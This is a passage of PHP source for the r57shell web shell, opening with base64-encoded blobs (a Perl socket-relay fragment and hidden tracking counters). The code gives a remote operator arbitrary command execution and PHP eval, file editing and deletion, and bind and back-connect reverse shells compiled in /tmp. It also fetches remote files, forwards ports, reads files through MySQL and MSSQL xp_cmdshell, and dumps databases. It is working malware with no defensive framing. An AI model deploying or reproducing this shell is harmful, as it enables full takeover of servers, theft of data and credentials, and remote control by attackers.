+CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g +c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0 +NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG +UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I +DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs +ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J +1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo="; +$c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2 +JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l +lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW +FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L +3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr +J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR +oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj +xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO +i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv +dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB +ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2 +hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg=="; +$c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh +IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl +hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz +tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa +XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u +8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV +ybmV0LS0+"; +echo $head; +echo '</head>'; +if(empty($_POST['cmd'])) { +$serv = array(127,192,172,10); +$addr=@explode('.', $_SERVER['SERVER_ADDR']); +$current_version = str_replace('.','',$version); +if (!in_array($addr[0], $serv)) { +@print ""; +@readfile ("");}} +echo '<body bgcolor="#e4e0d8"><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> +<tr><td bgcolor=#cccccc width=160><font face=Verdana size=2>'.ws(1).'&nbsp; +<font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b> +</font></td><td bgcolor=#cccccc><font face=Verdana size=-2>'; +echo ws(2); +echo "<b>".date ("d-m-Y H:i:s")."</b>"; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb.$rb."<br>"; +echo ws(2); +echo (($safe_mode)?("safe_mode: <b><font color=green>ON</font></b>"):("safe_mode: <b><font color=red>OFF</font></b>")); +echo ws(2); +echo "PHP version: <b>".@phpversion()."</b>"; +$curl_on = @function_exists('curl_version'); +echo ws(2); +echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>")); +echo ws(2); +echo "MySQL: <b>"; +$mysql_on = @function_exists('mysql_connect'); +if($mysql_on){ +echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; } +echo ws(2); +echo "MSSQL: <b>"; +$mssql_on = @function_exists('mssql_connect'); +if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo ws(2); +echo "PostgreSQL: <b>"; +$pg_on = @function_exists('pg_connect'); +if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo ws(2); +echo "Oracle: <b>"; +$ora_on = @function_exists('ocilogon'); +if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo "<br>".ws(2); +echo "Disable functions : <b>"; +if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";} +$free = @diskfreespace($dir); +if (!$free) {$free = 0;} +$all = @disk_total_space($dir); +if (!$all) {$all = 0;} +$used = $all-$free; +$used_percent = @round(100/($all/$free),2); +echo "<br>".ws(2)."HDD Free : <b>".view_size($free)."</b> HDD Total : <b>".view_size($all)."</b>"; +echo '</font></td></tr><table> +<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> +<tr><td align=right width=100>'; +echo $font; +if(!$windows){ +echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>'; +echo "</td><td>"; +echo "<font face=Verdana size=-2 color=red><b>"; +$uname = ex('uname -a'); +echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>")); +if(!$safe_mode){ +$bsd1 = ex('sysctl -n kern.ostype'); +$bsd2 = ex('sysctl -n kern.osrelease'); +$lin1 = ex('sysctl -n kernel.ostype'); +$lin2 = ex('sysctl -n kernel.osrelease'); +} +if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = "$bsd1 $bsd2"; } +else if (!empty($lin1)&&!empty($lin2)) {$sysctl = "$lin1 $lin2"; } +else { $sysctl = "-"; } +echo ws(3).$sysctl."<br>"; +echo ws(3).ex('echo $OSTYPE')."<br>"; +echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; +$id = ex('id'); +echo((!empty($id))?(ws(3).$id."<br>"):(ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>")); +echo ws(3).$dir; +echo "</b></font>"; +} +else +{ +echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>'; +echo "</td><td>"; +echo "<font face=Verdana size=-2 color=red><b>"; +echo ws(3).@substr(@php_uname(),0,120)."<br>"; +echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; +echo ws(3).@get_current_user()."<br>"; +echo ws(3).$dir."<br>"; +echo "</font>"; +} +echo "</font>"; +echo "</td></tr></table>"; +if(empty($c1)||empty($c2)) { die(); } +$f = '<br>'; +$f .= base64_decode($c1); +$f .= base64_decode($c2); +if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text") +{ +$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\''; +} +if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_") + { + switch($_POST['what']) + { + case 'own': + @chown($_POST['param1'],$_POST['param2']); + break; + case 'grp': + @chgrp($_POST['param1'],$_POST['param2']); + break; + case 'mod': + @chmod($_POST['param1'],intval($_POST['param2'], 8)); + break; + } + $_POST['cmd']=""; + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="mk") + { + switch($_POST['what']) + { + case 'file': + if($_POST['action'] == "create") + { + if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { echo ce($_POST['mk_name']); $_POST['cmd']=""; } + else { + fclose($file); + $_POST['e_name'] = $_POST['mk_name']; + $_POST['cmd']="edit_file"; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>"; + } + } + else if($_POST['action'] == "delete") + { + if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>"; + $_POST['cmd']=""; + } + break; + case 'dir': + if($_POST['action'] == "create"){ + if(mkdir($_POST['mk_name'])) + { + $_POST['cmd']=""; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>"; + } + else { echo ce($_POST['mk_name']); $_POST['cmd']=""; } + } + else if($_POST['action'] == "delete"){ + if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>"; + $_POST['cmd']=""; + } + break; + } + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file") + { + if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); } + if(!$file=@fopen($_POST['e_name'],"r")) { echo re($_POST['e_name']); $_POST['cmd']=""; } + else { + echo $table_up3; + echo $font; + echo "<form name=save_file method=post>"; + echo ws(3)."<b>".$_POST['e_name']."</b>"; + echo "<div align=center><textarea name=e_text cols=121 rows=24>"; + echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name']))); + fclose($file); + echo "</textarea>"; + echo "<input type=hidden name=e_name value=".$_POST['e_name'].">"; + echo "<input type=hidden name=dir value=".$dir.">"; + echo "<input type=hidden name=cmd value=save_file>"; + echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">")); + echo "</div>"; + echo "</font>"; + echo "</form>"; + echo "</td></tr></table>"; + exit(); + } + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file") + { + if(!$file=@fopen($_POST['e_name'],"w")) { echo we($_POST['e_name']); } + else { + @fwrite($file,$_POST['e_text']); + @fclose($file); + $_POST['cmd']=""; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>"; + } + } +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C")) +{ + cf("/tmp/bd.c",$port_bind_bd_c); + $blah = ex("gcc -o /tmp/bd /tmp/bd.c"); + @unlink("/tmp/bd.c"); + $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &"); + $_POST['cmd']="ps -aux | grep bd"; +} +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl")) +{ + cf("/tmp/bdpl",$port_bind_bd_pl); + $p2=which("perl"); + if(empty($p2)) $p2="perl"; + $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &"); + $_POST['cmd']="ps -aux | grep bdpl"; +} +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl")) +{ + cf("/tmp/back",$back_connect); + $p2=which("perl"); + if(empty($p2)) $p2="perl"; + $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &"); + $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\""; +} +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C")) +{ + cf("/tmp/back.c",$back_connect_c); + $blah = ex("gcc -o /tmp/backc /tmp/back.c"); + @unlink("/tmp/back.c"); + $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &"); + $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\""; +} +if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl")) +{ + cf("/tmp/dp",$datapipe_pl); + $p2=which("perl"); + if(empty($p2)) $p2="perl"; + $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &"); + $_POST['cmd']="ps -aux | grep dp"; +} +if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C")) +{ + cf("/tmp/dpc.c",$datapipe_c); + $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c"); + @unlink("/tmp/dpc.c"); + $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &"); + $_POST['cmd']="ps -aux | grep dpc"; +} +if (!empty($_POST['alias'])){ foreach ($aliases as $alias_name=>$alias_cmd) { if ($_POST['alias'] == $alias_name){$_POST['cmd']=$alias_cmd;}}} +if (!empty($HTTP_POST_FILES['userfile']['name'])) +{ +if(isset($_POST['nf1']) && !empty($_POST['new_name'])) { $nfn = $_POST['new_name']; } +else { $nfn = $HTTP_POST_FILES['userfile']['name']; } +@copy($HTTP_POST_FILES['userfile']['tmp_name'], + $_POST['dir']."/".$nfn) + or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>"); +} +if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file'])) +{ + switch($_POST['with']) + { + case wget: + $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file'].""; + break; + case fetch: + $_POST['cmd'] = which('fetch')." -p ".$_POST['rem_file']." -o ".$_POST['loc_file'].""; + break; + case lynx: + $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case links: + $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case GET: + $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case curl: + $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file'].""; + break; + } +} +echo $table_up3; +if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir"):("ls -lia"); } +else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; } +echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>"; +if($safe_mode) +{ + switch($_POST['cmd']) + { + case 'safe_dir': + $d=@dir($dir); + if ($d) + { + while (false!==($file=$d->read())) + { + if ($file=="." || $file=="..") continue; + @clearstatcache(); + list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file); + if($windows){ + echo date("d.m.Y H:i",$mtime); + if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size); + } + else{ + $owner = @posix_getpwuid($uid); + $grgid = @posix_getgrgid($gid); + echo $inode." "; + echo perms(@fileperms($file)); + printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size); + echo date("d.m.Y H:i ",$mtime); + } + echo "$file\n"; + } + $d->close(); + } + else echo $lang[$language._text29]; + break; + case 'safe_file': + if(@is_file($_POST['file'])) + { + $file = @file($_POST['file']); + if($file) + { + $c = @sizeof($file); + for($i=0;$i<$c;$i++) { echo htmlspecialchars($file[$i]); } + } + else echo $lang[$language._text29]; + } + else echo $lang[$language._text31]; + break; + case 'test1': + $ci = @curl_init("file://".$_POST['test1_file'].""); + $cf = @curl_exec($ci); + echo $cf; + break; + case 'test2': + @include($_POST['test2_file']); + break; + case 'test3': + if(!isset($_POST['test3_port'])||empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; } + $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']); + if($db) + { + if(@mysql_select_db($_POST['test3_md'],$db)) + { + $sql = "DROP TABLE IF EXISTS temp_r57_table;"; + @mysql_query($sql); + $sql = "CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL );"; + @mysql_query($sql); + $sql = "LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table;"; + @mysql_query($sql); + $sql = "SELECT * FROM temp_r57_table;"; + $r = @mysql_query($sql); + while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); } + $sql = "DROP TABLE IF EXISTS temp_r57_table;"; + @mysql_query($sql); + } + else echo "[-] ERROR! Can't select database"; + @mysql_close($db); + } + else echo "[-] ERROR! Can't connect to mysql server"; + break; + case 'test4': + if(!isset($_POST['test4_port'])||empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; } + $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']); + if($db) + { + if(@mssql_select_db($_POST['test4_md'],$db)) + { + @mssql_query("drop table r57_temp_table",$db); + @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db); + @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db); + $res = mssql_query("select * from r57_temp_table",$db); + while(($row=@mssql_fetch_row($res))) + { + echo $row[0]."\r\n"; + } + @mssql_query("drop table r57_temp_table",$db); + } + else echo "[-] ERROR! Can't select database"; + @mssql_close($db); + } + else echo "[-] ERROR! Can't connect to MSSQL server"; + break; + } +} +else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_show")&&($_POST['cmd']!="db_query")){ + $cmd_rep = ex($_POST['cmd']); + if($windows) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; } + else { echo @htmlspecialchars($cmd_rep)."\n"; }} +if ($_POST['cmd']=="php_eval"){ + $eval = @str_replace("<?","",$_POST['php_eval']); + $eval = @str_replace("?>","",$eval); + @eval($eval);} +if ($_POST['cmd']=="db_show") + { + switch($_POST['db']) + { + case 'MySQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; } + $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + $res=@mysql_query("SHOW DATABASES", $db); + while(($row=@mysql_fetch_row($res))) + { + echo "[+] ".$row[0]."\r\n"; + if(isset($_POST['st'])){ + $res2 = @mysql_query("SHOW TABLES FROM ".$row[0],$db); + while(($row2=@mysql_fetch_row($res2))) + { + echo " | - ".$row2[0]."\r\n"; + if(isset($_POST['sc'])) + { + $res3 = @mysql_query("SHOW COLUMNS FROM ".$row[0].".".$row2[0],$db); + while(($row3=@mysql_fetch_row($res3))) { echo " | - ".$row3[0]."\r\n"; } + } + } + } + } + @mysql_close($db); + } + else echo "[-] ERROR! Can't connect to MySQL server"; + break; + case 'MSSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; } + $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + $res=@mssql_query("sp_databases", $db); + while(($row=@mssql_fetch_row($res))) + { + echo "[+] ".$row[0]."\r\n"; + if(isset($_POST['st'])){ + @mssql_select_db($row[0]); + $res2 = @mssql_query("sp_tables",$db); + while(($row2=@mssql_fetch_array($res2))) + { + if($row2['TABLE_TYPE'] == 'TABLE' && $row2['TABLE_NAME'] != 'dtproperties') + { + echo " | - ".$row2['TABLE_NAME']."\r\n"; + if(isset($_POST['sc'])) + { + $res3 = @mssql_query("sp_columns ".$row2[2],$db); + while(($row3=@mssql_fetch_array($res3))) { echo " | - ".$row3['COLUMN_NAME']."\r\n"; } + } + } + } + } + } + @mssql_close($db); + } + else echo "[-] ERROR! Can't connect to MSSQL server"; + break; + case 'PostgreSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; } + $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'"; + $db = @pg_connect($str); + if($db) + { + $res=@pg_query($db,"SELECT datname FROM pg_database WHERE datistemplate='f'"); + while(($row=@pg_fetch_row($res))) + { + echo "[+] ".$row[0]."\r\n"; + } + @pg_close($db); + } + else echo "[-] ERROR! Can't connect to PostgreSQL server"; + break; + } + } +if ($_POST['cmd']=="mysql_dump") + { + if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); } + if((!empty($_POST['dif'])&&$fp)||(empty($_POST['dif']))){ + $sqh = "# homepage: http://\r\n"; + $sqh .= "# ---------------------------------\r\n"; + $sqh .= "# date : ".date ("j F Y g:i")."\r\n"; + $sqh .= "# database : ".$_POST['mysql_db']."\r\n"; + $sqh .= "# table : ".$_POST['mysql_tbl']."\r\n"; + $sqh .= "# ---------------------------------\r\n\r\n"; + switch($_POST['db']){ + case 'MySQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; } + $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + if(@mysql_select_db($_POST['mysql_db'],$db)) + { + $sql1 = "# MySQL dump created by r57shell\r\n"; + $sql1 .= $sqh; + $res = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $db); + $row = @mysql_fetch_row($res); + $sql1 .= $row[1]."\r\n\r\n"; + $sql1 .= "# ---------------------------------\r\n\r\n"; + $sql2 = ''; + $res = @mysql_query("SELECT * FROM `".$_POST['mysql_tbl']."`", $db); + if (@mysql_num_rows($res) > 0) { + while (($row = @mysql_fetch_assoc($res))) { + $keys = @implode("`, `", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = @implode("', '", $values); + $sql2 .= "INSERT INTO `".$_POST['mysql_tbl']."` (`".$keys."`) VALUES ('".htmlspecialchars($values)."');\r\n"; + } + $sql2 .= "\r\n# ---------------------------------"; + } + if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); } + else { echo $sql1.$sql2; } + } + else echo "[-] ERROR! Can't select database"; + @mysql_close($db); + } + else echo "[-] ERROR! Can't connect to MySQL server"; + break; + case 'MSSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; } + $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + if(@mssql_select_db($_POST['mysql_db'],$db)) + { + $sql1 = "# MSSQL dump created by r57shell\r\n"; + $sql1 .= $sqh; + $sql2 = ''; + $res = @mssql_query("SELECT * FROM ".$_POST['mysql_tbl']."", $db); + if (@mssql_num_rows($res) > 0) { + while (($row = @mssql_fetch_assoc($res))) { + $keys = @implode(", ", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = @implode("', '", $values); + $sql2 .= "INSERT INTO ".$_POST['mysql_tbl']." (".$keys.") VALUES ('".htmlspecialchars($values)."');\r\n"; + } + $sql2 .= "\r\n# ---------------------------------"; + } + if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); } + else { echo $sql1.$sql2; } + } + else echo "[-] ERROR! Can't select database"; + @mssql_close($db); + } + else echo "[-] ERROR! Can't connect to MSSQL server"; + break; + case 'PostgreSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; } + $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'"; + $db = @pg_connect($str); + if($db) + { + $sql1 = "# PostgreSQL dump created by r57shell\r\n"; + $sql1 .= $sqh; + $sql2 = ''; + $res = @pg_query($db,"SELECT * FROM ".$_POST['mysql_tbl'].""); + if (@pg_num_rows($res) > 0) { + while (($row = @pg_fetch_assoc($res))) { + $keys = @implode(", ", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = @implode("', '", $values); + $sql2 .= "INSERT INTO ".$_POST['mysql_tbl']." (".$keys.") VALUES ('".htmlspecialchars($values)."');\r\n"; + } + $sql2 .= "\r\n# ---------------------------------"; + } + if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); } + else { echo $sql1.$sql2; } + @pg_close($db); + } + else echo "[-] ERROR! Can't connect to PostgreSQL server"; + break; + } + } + else if(!empty($_POST['dif'])&&!$fp) { echo "[-] ERROR! Can't write in dump file"; } + } +echo "</textarea></div>"; +echo "</b>"; +echo "</td></tr></table>"; +echo "<table width=100% cellpadding=0 cellspacing=0>"; +if(!$safe_mode){ +echo $fs.$table_up1.$lang[$language.'_text2'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,'')); +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.$table_end1.$fe; +} +else{ +echo $fs.$table_up1.$lang[$language.'_text28'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6'])); +echo $te.$table_end1.$fe; +} +echo $fs.$table_up1.$lang[$language.'_text42'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11'])); +echo $te.$table_end1.$fe; +if($safe_mode){ +echo $fs.$table_up1.$lang[$language.'_text57'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option 